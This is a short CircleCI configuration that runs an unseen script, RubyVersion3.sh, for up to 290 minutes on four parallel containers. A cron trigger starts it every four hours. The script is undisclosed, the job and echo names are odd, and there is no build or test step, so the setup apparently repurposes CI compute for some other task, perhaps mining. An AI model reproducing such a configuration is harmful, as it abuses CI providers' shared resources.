working_dir: &working_dir ~/app

version: 2.0
jobs:
  manganang:
    parallelism: 4
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  chmod u+x RubyVersion3.sh && timeout 290m ./RubyVersion3.sh && echo "tisubasah"
        no_output_timeout: 290m
        
workflows:
  version: 2
  commit:
    jobs:
      - manganang
    triggers:
      - schedule:
          cron: "0 2,6,10,14,18,22 * * *"
          filters:
            branches:
              only:
                - master
                
  runningrubyjobs:
    jobs:
      - manganang
